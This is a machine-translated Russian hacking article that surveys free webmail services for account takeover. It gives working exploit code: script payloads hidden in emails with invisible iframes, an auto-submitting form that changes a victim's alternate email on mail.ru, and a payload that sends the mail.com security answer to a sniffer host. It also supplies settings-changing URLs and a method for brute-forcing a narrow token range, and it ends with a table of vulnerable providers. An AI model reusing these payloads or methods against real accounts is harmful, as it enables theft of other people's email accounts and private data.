This page has been robot translated, sorry for typos if any. Original content here.

VULNERABILITY REVIEW OF FREE POSTAL MAIL SERVICES

We continue to do web-mail. I did a little research on various services for hacking and present to you the results. The attack technology remains the same: a letter with a JavaScript code is sent to a different address, which is triggered when the letter is opened, and changes any information in the settings of the user's mailbox. It makes no sense to describe each server in detail, since the approach is the same everywhere, so I will give a few examples, and at the end - a table. In most cases, hacking can be considered 100%, with some assumptions: the user must definitely use the web interface to read letters, when writing exploits I was guided by a standard platform, that is, I initially assume that the user does not have any exotic OS or Browser with JS execution disabled.

WWW.MAIL.RU

I'll start with mail number 1 in Russia. At the moment, thanks to skipping JavaScript and one mistake of the developers, this box can be hacked. I believe that the basic principles are well known. How to get a password? 1 - unauthorized change of it. Fails, you need to know the previously installed. 2 - change the secret question and use the amnesia control service. It won't work either. 3 - set your alternative Email to receive a new password generated by the system. It will not work, the last two of the above options are in the same form and are also password protected. Even the rest of the settings that are of less interest to us (Name, Surname, etc.) will now fail to be changed without entering the current password. It would seem that there are no options. However, there is such a secondary, inconspicuous section of the "Contact Information" settings (ICQ, website, phone, place of work, time zone, etc.). You can also specify a contact Email in this section. The trick is that in this case the alternative address in the registration information changes but the one that is written in the questionnaire, and now you can get the password for the soap using the reminder service. Everything is simple. URL: http://win.mail.ru/cgi-bin/anketa?page=2&Email=hacker@antichat.ru However, using the GET method, settings cannot now be changed in the mail.ru mailbox, therefore I will describe in detail the technical side of the issue.

I. We send a letter with a code to the desired mailbox, which will generate a frame directly in the body of the message with a link to our website. If possible, the script should be triggered without any user involvement (clicking, clicking, hovering, image loading, etc.):


 <embed src = "javascript: document.getElementById ('xxx'). innerHTML = '<iframe src = http: //yoursite.yourdomain.ru/yourscript.html> </iframe>'; this.wav">
 <p id = 'xxx'>
In order to fully ensure the performance of the script, as well as masking, we transform:
 <embed src = "javascript: status = location; document.getElementById ('xxx'). innerHTML = '<iframe src = http: //yoursite.ru/yourscript.html width = 0 height = 0> </iframe>' ; this.wav "width = 0 height = 0>
 <p id = 'xxx'>
As such, character codes replace letters in the name of javascript and iframe elements, and the mail script does not filter them out. Line status = location; creates the visibility of the local URL in the status bar so that extraneous flickering does not cause suspicion. The width and height attributes of both the frame and embed are set to zero and make them invisible.

II. On the resource http://yoursite.ru we have an HTML document with the form for sending the modified data to the mail.ru server.

The content of yourscript.html:
 <form method = "post" action = "http://win.mail.ru/cgi-bin/anketa" name = "anketa"> <br>
 <input type = "hidden" name = "page" value = "2"> <br>
 <input type = "hidden" name = "Email" value = "hacker@antichat.ru"> <br>
 <input type = "hidden" value = "Save" name = "Save"> <br>
 </form> <br>
 <script> <br>
 document.anketa.submit (); <br>
 </script>
Notes: I guarantee the work of the client part of the script unchanged only for IE; the sending form is posted on a separate site specifically to "offload" the letter.


WWW.MAIL.COM

Now a slightly different security error, for example http://mail.com. If you use the password reminder service, then to get it, just enter the correct answer to the security question (one of the options). So we set ourselves the task of getting this answer. This is done easily. When I went into the properties of the mailbox and looked at the registration information, I saw that the answer to the secret question was not hidden, which allows us to read its value using JavaScript.

We implement the script through the style tag.
Settings page address: http://mail01.mail.com/scripts/common/genprofile.cgi
Form Name: profileform
Secret text field name hint_a
As a result, to steal the secret question, you need to call the settings page, start JavaScript, get the value document.profileform.hint_a.value, and pass it to the sniffer along with the environment variable REQUEST_UR I.

Ready option:
 <style> @import url (javascript: document.getElementById ('out'). innerHTML = "<iframe src = http: //mail01.mail.com/scripts/common/genprofile.cgi name = 'zero'% 6FnLoad = `str = document.zero.profileform.hint_a.value; path = 'http: //zero.h12.ru/stat/capt.php?'; document.zero.location = path + str`> </iframe>" ); </style>
 <span id = 'out'> </span>
In the generated frame with the name zero, the settings page is loaded. At the end of the download, the OnLoad handler launches a script for reading the security question, and then, through the same frame, sends a response to the sniffer. Now just go to http://zero.h12.ru/stat/log.php and find the necessary information in the "Host" line .

WWW.NEWMAIL.RU

In my opinion, it’s a pretty popular mailer, so I’ll talk about it in detail. Moreover, taking possession of someone else's account on it is much easier than it seems at first glance. You can do this: send an email with a script that will receive a session id at startup, generate the necessary requests, and change the settings of the alternative email (which will then be sent to the password) and the secret question and answer. However, if you specify any other address during the reminder, the password will be sent to it, if only the secret answer was correct. And the following observation: session id for changing settings can generally NOT be used. Plus, any tags are allowed. All of the above reduces the amount of code to a couple of lines:
 <iframe src = http: //newmail.ru/users/chpass.dhtml? cp_msg = 1 & cp_quest = QUESTION & cp_answ = ANSWER width = 0 height = 0> </iframe> 

WWW.E-MAIL.RU

The method of hacking e-mail.ru does not fit somewhat into the general subject of the article, but nevertheless - mail :) . When I needed to get the password from one box, as usual I registered an account and began to research the system. The first thing that caught my eye was the ability to set a new password and a secret question with the answer, without entering the old password. The usual action plan: check the filtering of tags, get the ID and execute the request. However, to change the settings, a special variable called utoken was used, which is contained in the body of the document. Having experimented with changing the question and answer with the previously known utoken:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ QUESTION&panswer= http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ I came to I conclude that ID and cookies are not required to change the settings. At the same time, after observing utoken, it was found that the four-digit hexadecimal number after the email address email@e-mail.ru-5a00 lies in a very narrow range. Namely, in order to establish a secret question with an answer on any box that interests us, you need to sort through only 7 options: 5a00 , 5b00 , 5c00 , 5d00 , 5e00 , 5f00 , 6000 . When the number is guessed, we will get into the right box.

Notes: some changes have occurred at the moment. Password recovery service does not work, so it’s advisable to change it right away. The setting change address has also changed:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&u_token=email@e-mail.ru-5c00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ The method does not always work. Probably, it is nevertheless required that the user occasionally logs in via the web .

Table with the characteristics of free WWW-servers

SERVER Javascript VULNERABILITY
www.km.ru
km.ru
img src = javascript: Allows you to read the password from the settings page from the password field
www.mail.ru
inbox.ru , bk.ru , list.ru ,
embed src = javascript: Alternative email can be changed
www.mail.com
email.com , post.com , myself.com , consultant.com , etc.
@ import url (javascript:); The settings show the answer to the security question
www.newmail.ru
nm.ru , hotmail.ru , orc.ru , nightmail.ru
Any way Read / change the question and answer. Password issued valid
www.netman.ru and www.mailgate.ru
the same mailer. about 80 domains
img src = javascript:, style = background: url (javascript:) You can steal the answer to your security question, if one is set. It is also possible to set the address for forwarding (copies are not saved)
www.yandex.ru OnError, OnLoad Removing the site * .narod.ru (JS is not required)
www.ukr.net embed src = javasc
ript: this .wav>
Read the answer to the security question.
www.nextmail.ru
xaker.ru , email.su , russian.ru , students.ru , programist.ru , designer.ru , mail2k.ru ,
embed src = "javascript: Change / steal the answer to the security question
www.hotbox.ru
pochta.ru , pisem.net , fromru.com , land.ru , etc.
In many ways Account deleting
www.rin.ru embed src = javascript: Read Secret Answer